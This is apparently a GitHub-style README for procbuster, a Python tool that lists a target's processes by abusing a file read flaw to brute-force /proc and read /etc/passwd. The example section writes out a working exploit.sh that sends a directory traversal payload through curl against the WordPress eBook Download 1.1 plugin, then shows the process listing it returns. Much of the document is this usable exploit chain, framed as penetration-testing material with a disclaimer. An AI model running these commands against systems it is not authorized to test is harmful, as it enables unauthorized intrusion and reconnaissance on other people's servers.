procbuster

procbuster is a Python-based system process enumerator that exploits arbitrary file read vulnerabilities (e.g. Local File Inclusion) to brute-force the /proc directory on a target machine. It reads each process's cmdline (and status when available) to list running processes — without shell access. The output mimics ps, making it easy to identify system activity and active services during exploitation.

---

⚠️ DISCLAIMER

This project is intended for educational, research, and authorized security testing purposes only.
Do not use this code on systems you do not own or have explicit permission to test.
The author is not responsible for any damage or misuse.

---

Usage

┌──(magicrc㉿perun)-[~/code/procbuster]
└─$ ~/code/procbuster/procbuster.py --help
usage: procbuster.py [-h] --file-read-cmd CMD [--max-pid MAX_PID] [--workers N] [--timeout S]

Lists processes by brute-forcing /proc PIDs and reading status and cmdline.

options:
  -h, --help           show this help message and exit
  --file-read-cmd CMD  Command used to read remote files. The target path is appended as the last argument. Example: ./exploit.sh
  --max-pid MAX_PID    Maximum PID to check (default: 65535)
  --workers N          Concurrent worker threads (default: 50)
  --timeout S          Per-request timeout in seconds (default: 5)

--file-read-cmd is mandatory. The command must accept a remote file path as its last argument and print the file contents to stdout. Empty output is treated as "file not found".

Before scanning, procbuster validates the command by reading /proc/self/cmdline on the target. If no output is returned the tool exits immediately with an error.

---

How it works

1. Reads /etc/passwd from the target to build a UID → username map.
2. Brute-forces PIDs from 1 to --max-pid concurrently using a thread pool.
3. For each PID, reads /proc/<pid>/cmdline as the primary existence check.
4. If /proc/<pid>/status is also readable, extracts the process name and UID for user resolution.
5. Prints results as they arrive (no buffering).

---

Example

Using WordPress eBook Download 1.1 Directory Traversal vulnerability

┌──(magicrc㉿perun)-[~/code/procbuster]
└─$ cat exploit.sh
#!/bin/bash
curl -s -o - "http://target/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../..$1" \
    | sed "s|\(../../../../../..${1}\)\+||g" \
    | sed 's#<script>window\.close()</script>$##'

┌──(magicrc㉿perun)-[~/code/procbuster]
└─$ ./procbuster.py --file-read-cmd ./exploit.sh --max-pid 20
PID     USER                 CMD
1       root                 /sbin/init auto automatic-ubiquity noprompt
2       root                 [kthreadd]
3       root                 [rcu_gp]
4       root                 [rcu_par_gp]
6       root                 [kworker/0:0H-kblockd]
7       root                 [kworker/0:1-events]
9       root                 [mm_percpu_wq]
10      root                 [ksoftirqd/0]
11      root                 [rcu_sched]
12      root                 [migration/0]
13      root                 [idle_inject/0]
14      root                 [cpuhp/0]
15      root                 [cpuhp/1]
16      root                 [idle_inject/1]
17      root                 [migration/1]
18      root                 [ksoftirqd/1]
20      root                 [kworker/1:0H-kblockd]